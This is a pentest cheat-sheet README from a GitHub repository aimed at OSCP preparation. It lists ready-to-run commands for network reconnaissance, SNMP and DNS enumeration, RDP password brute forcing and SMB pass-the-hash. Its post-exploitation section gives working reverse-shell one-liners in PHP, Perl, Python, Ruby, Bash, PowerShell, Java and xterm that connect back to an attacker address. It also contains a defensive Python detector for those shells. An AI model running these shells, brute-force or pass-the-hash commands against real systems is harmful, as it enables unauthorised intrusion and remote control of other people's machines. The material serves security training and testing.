A collection of snippets of codes and commands to make your life easier!

54N4L/Pentest-Cheat-Sheets

Pentest-Cheat-Sheets

This repo is a collection of code snippets and commands to make our lives easier. The main purpose is not to be a crutch but to avoid wasting precious time. It also helps those preparing for the OSCP: you'll find many ways to do things without the Metasploit Framework.

Ninja Tricks

Recon

DNS

Nslookup

Resolve a given hostname to the corresponding IP.

nslookup targetorganization.com
Reverse DNS lookup
nslookup -type=PTR IP_address
MX (Mail Exchange) lookup
nslookup -type=MX domain
Zone Transfer
Using nslookup Command
nslookup
server domain.com
ls -d domain.com
Using the host command

host -t ns <domain>          (ns = name server records)

host -t ns domain.com

Then try a zone transfer against each nameserver found:

host -l <domain> <nameserver>

host -l domain.com ns2.domain.com
Nmap DNS Enumeration
nmap -F --dns-server <dns server ip> <target ip range>

Auto tools

DNSenum
dnsenum targetdomain.com
dnsenum --target_domain_subs.txt -v -f dns.txt -u a -r targetdomain.com
DNSmap
dnsmap targetdomain.com -w <wordlist.txt>

Brute force and save the results to a file under /tmp:

dnsmap targetdomain.com -r
DNSRecon DNS Brute Force
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml
Fierce.pl
fierce -dns targetdomain.com
HostMap
hostmap.rb -only-passive -t <IP>

Other useful hostmap options: -with-zonetransfer and -bruteforce-level

Online Tools

Nmap

Set the IP address and the network as variables:

export ip=192.168.1.100
export netw=192.168.1.0/24

Detecting Live Hosts

Only IPs

nmap -sn -n $netw | grep for | cut -d" " -f5
Stealth Scan
nmap -sS $ip

Only Open Ports and Banner Grab

nmap -n -Pn -sS $ip --open -sV

Stealth scan using FIN Scan

nmap -sF $ip
Aggressive scan

No ping, no DNS resolution, show only open ports, and test all TCP ports

nmap -n -Pn -sS -A $ip --open -p-

Nmap verbose scan, runs syn stealth, T4 timing, OS and service version info, traceroute and scripts against services

nmap -v -sS -A -T4 $ip

OS Fingerprint

nmap -O $ip

Quick Scan

nmap -T4 -F $netw

Quick Scan Plus

nmap -sV -T4 -O -F --version-light $netw

Output to a file (normal format)

nmap -oN nameFile -p 1-65535 -sV -sS -A -T4 $ip

Output to a file in all formats (-oA: normal, grepable and XML)

nmap -oA nameFile -p 1-65535 -sV -sS -A -T4 $netw

Search NMAP scripts

ls /usr/share/nmap/scripts/ | grep ftp

NetCat

Port Scanner

One port

nc -nvz 192.168.1.23 80

Port Range

nc -vnz 192.168.1.23 0-1000
Send files
  • Server
nc -lvp 1234 > file_name_to_save
  • Client
nc -vn 192.168.1.33 1234 < file_to_send
Executing remote script
  • Server
nc -lvp 1234 -e ping.sh <IP>
  • Client
nc -vn 192.168.1.33 1234
Chat with encryption
  • Server
ncat -nlvp 8000 --ssl
  • Client
ncat -nv 192.168.1.33 8000
Banner Grabbing
nc <target> <port>
<HTTP_verb> <path> HTTP/<version>
Host: <url>
nc www.bla.com.br 80
HEAD / HTTP/1.0
Host: www.bla.com.br
If the site uses HTTPS, connect with openssl instead of nc and send the same request:
openssl s_client -quiet -connect www.bla.com.br:443

SNMP

Fixing SNMP output
apt-get install snmp-mibs-downloader
download-mibs
echo "" > /etc/snmp/snmp.conf
OneSixtyone

onesixtyone -c COMMUNITY_FILE -i Target_ip

onesixtyone -c community.txt -i Found_ips.txt
snmpwalk

Walking MIBs

snmpwalk -c COMMUNITY -v VERSION target_ip

snmpwalk -c public -v1 192.168.25.77

Walk a specific MIB node: snmpwalk -c <community> -v <version> <target_ip> <MIB node>. Example node for user accounts: 1.3.6.1.4.1.77.1.2.25

snmpwalk -c public -v1 192.168.25.77 1.3.6.1.4.1.77.1.2.25
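As an added example (not part of this repo), the following Python parses the snmpwalk output for the user-account node above. With no MIBs loaded, snmpwalk prints numeric OIDs, and each row's index is the user name encoded as its length followed by its ASCII byte values; the decoder recovers it. The sample output is constructed, not captured from a real host.

```python
import re

# Constructed sample of `snmpwalk -c public -v1 <target> 1.3.6.1.4.1.77.1.2.25`
# output with no MIBs loaded (numeric OIDs); not captured from a real host.
# The last row belongs to a neighbouring table and is included to show filtering.
SAMPLE_WALK = """\
iso.3.6.1.4.1.77.1.2.25.1.1.5.71.117.101.115.116 = STRING: "Guest"
iso.3.6.1.4.1.77.1.2.25.1.1.13.65.100.109.105.110.105.115.116.114.97.116.111.114 = STRING: "Administrator"
iso.3.6.1.4.1.77.1.2.25.1.1.3.98.111.98 = STRING: "bob"
iso.3.6.1.4.1.77.1.2.27.1.1.9.115.104.97.114.101.100.100.111.99 = STRING: "shareddoc"
"""

# Column holding user names under the page's node (1.3.6.1.4.1.77.1.2.25);
# the leading "1" is dropped because snmpwalk prints it as "iso".
USER_NAME_COLUMN = "3.6.1.4.1.77.1.2.25.1.1"
LINE_RE = re.compile(r'^(?:iso|\.?1)\.(?P<oid>[\d.]+) = STRING: "(?P<value>[^"]*)"$')

def decode_index(index):
    """Decode a string-valued table index: the first sub-id is the length,
    the remaining sub-ids are the byte values of the string."""
    parts = [int(x) for x in index.split(".")]
    length, codes = parts[0], parts[1:]
    if length != len(codes):
        raise ValueError(f"index says {length} bytes but {len(codes)} follow")
    return bytes(codes).decode("ascii")

def parse_user_accounts(walk_output):
    """Map each user name decoded from the OID index to the row's STRING value."""
    users = {}
    for line in walk_output.splitlines():
        m = LINE_RE.match(line.strip())
        if not m or not m.group("oid").startswith(USER_NAME_COLUMN + "."):
            continue  # skip rows from other nodes and non-STRING rows
        index = m.group("oid")[len(USER_NAME_COLUMN) + 1:]
        users[decode_index(index)] = m.group("value")
    return users

if __name__ == "__main__":
    for name, value in parse_user_accounts(SAMPLE_WALK).items():
        print(f"{name!r} (from OID index) -> {value!r}")
```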
snmp-check

snmp-check -t <target_ip>
snmp-check -t <target_ip> -c <community>

snmp-check -t 172.20.10.5
snmp-check -t 172.20.10.5 -c public
Automate the username enumeration process for SNMPv3
apt-get install snmp snmp-mibs-downloader
wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb
NMAP SNMPv3 Enumeration
nmap -sV -p 161 --script=snmp-info 172.20.10.0/24
Default Credentials
/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt

MYSQL

Try remote default Root access

MySQL open to the world:

mysql -h Target_ip -u root -p
Try Local default Root access Windows

TODO!

Try Local default Root access Linux

TODO!

MSSQL

MSSQL Information Gathering
nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip

Exploitation

System Network

RDP

xfreerdp

Simple User Enumeration for Windows Target (kerberos based)

xfreerdp /v:<target_ip> -sec-nla /u:""

xfreerdp /v:192.168.0.32 -sec-nla /u:""

Login

xfreerdp /u: /g: /p: /v:<target_ip>

xfreerdp /u:administrator /g:grandbussiness /p:bla /v:192.168.1.34
Wordlist-based brute force

NCRACK

ncrack -vv --user/-U <username/username_wordlist> --pass/-P <password/password_wordlist> <target_ip>:3389

ncrack -vv --user user -P wordlist.txt 192.168.0.32:3389

Crowbar

crowbar -b rdp <-u/-U user/user_wordlist> -c/-C <password/password_wordlist> -s <target_ip>/32 -v

crowbar -b rdp -u user -C password_wordlist -s 192.168.0.16/32 -v

Pass the hash

SMB pass the hash
Tool:

pth-toolkit

Listing shared folders (the final positional argument is the NT hash, shown here as the placeholder <NT_HASH>)

sudo pth-smbclient --user=<user> --pw-nt-hash -m smb3 -L <target_ip> \\<target_ip>\ <NT_HASH>

sudo pth-smbclient --user=user --pw-nt-hash -m smb3 -L 192.168.0.24 \\\\192.168.0.24\\ <NT_HASH>

Interactive smb shell

sudo pth-smbclient --user=<user> --pw-nt-hash -m smb3 \\<target_ip>\<shared_folder> <NT_HASH>

sudo pth-smbclient --user=user --pw-nt-hash -m smb3 \\\\192.168.0.24\\folder <NT_HASH>

Post Exploitation

Reverse Shell

PHP Reverse Shell

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Perl Reverse Shell

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Ruby Reverse Shell

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Bash Reverse Shell

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

PowerShell Reverse Shell

Create a simple powershell script called reverse.ps1:

function reverse_powershell {
    $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
}
powershell -ExecutionPolicy bypass -command "Import-Module reverse.ps1; reverse_powershell"

Java Reverse Shell (Groovy syntax, e.g. for a script console)

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Xterm Reverse Shell

One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.

xterm -display 10.0.0.1:1

To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):

Xnest :1

You’ll need to authorise the target to connect to you (command also run on your host):

xhost +targetip
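The one-liners in this section are also what a defender has to recognise. The following Python, an added example that is not part of this repo, matches process-creation log lines (constructed samples, not real logs) against the fragments of the PHP, Perl, Python, Ruby, Bash, PowerShell and xterm shells above, requiring several fragments per rule to limit false positives, and pulls out the callback address for triage.

```python
import re

# Each rule lists regex fragments that must ALL occur in one command line.
# Requiring several fragments per one-liner keeps false positives low.
RULES = {
    "php_fsockopen_shell": [r"fsockopen\(", r"exec\(.*/bin/(ba)?sh"],
    "perl_socket_shell": [r"socket\(S,PF_INET", r"exec\(\"/bin/(ba)?sh"],
    "python_dup2_shell": [r"socket\.socket\(", r"dup2\(", r"subprocess"],
    "ruby_tcpsocket_shell": [r"TCPSocket\.open\(", r"\bexec\b"],
    "bash_devtcp_shell": [r"/dev/tcp/\S+/\d+"],
    "powershell_tcpclient_shell": [r"Net\.Sockets\.TCPClient", r"GetStream\(\)", r"\biex\b"],
    "xterm_display_callback": [r"\bxterm\b.*-display\s+\S+:\d+"],
}
COMPILED = {name: [re.compile(p, re.I) for p in pats] for name, pats in RULES.items()}
IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")

# Constructed sample process-creation log lines (not from any real host).
SAMPLE_LOGS = [
    "web01 execve uid=33 cmd=php -r '$sock=fsockopen(\"10.0.0.1\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "web01 execve uid=1000 cmd=bash -i >& /dev/tcp/10.0.0.1/8080 0>&1",
    "app02 execve uid=1000 cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0);p=subprocess.call([\"/bin/sh\",\"-i\"])'",
    "app02 execve uid=0 cmd=xterm -display 10.0.0.1:1",
    "app02 execve uid=1000 cmd=ls -la /var/www",
    "app02 execve uid=1000 cmd=python -c 'import socket;print(socket.gethostname())'",
]

def detect_reverse_shells(log_lines):
    """Return (line_no, rule_name, callback_ip) for every line matching a rule."""
    hits = []
    for no, line in enumerate(log_lines, start=1):
        for name, pats in COMPILED.items():
            if all(p.search(line) for p in pats):
                ip = IPV4.search(line)  # first IPv4 literal is the likely callback target
                hits.append((no, name, ip.group(0) if ip else None))
    return hits

if __name__ == "__main__":
    for no, name, ip in detect_reverse_shells(SAMPLE_LOGS):
        print(f"line {no}: {name} -> callback {ip}")
```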

Linux

Windows

Pivoting

Openssh for Tunneling

Once you have SYSTEM on the target machine, download openssh_for_windows and unzip it:

powershell -command "Expand-Archive 'C:\<path-to-zipped-openssh>\openssh.zip' c:\<destination-folder>\"

Then install it:

powershell -ExecutionPolicy Bypass -File c:\<path-to-unzipped-openssh-folder>\install-sshd.ps1

Now if you need, just adjust the firewall rules to your needs:

powershell -Command "New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22"

Start the sshd service:

net start sshd

After these steps a regular ssh tunnel will suffice.

From your Linux machine:

$ ssh -ACv -D <tunnel_port> <windows-user>@<windows-ip>

Done: you now have a SOCKS proxy to tunnel through.

Resources

HTTP/HTTPS Servers

HTTPS using Python

Create the Certificate:

openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes

Start the HTTPS Server (Python 3; the original snippet used the Python 2 BaseHTTPServer module)

import http.server
import ssl

# Serve the current directory over TLS using the self-signed server.pem created above
httpd = http.server.HTTPServer(('0.0.0.0', 443), http.server.SimpleHTTPRequestHandler)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(certfile='./server.pem')
httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()

Contribution

HOW TO
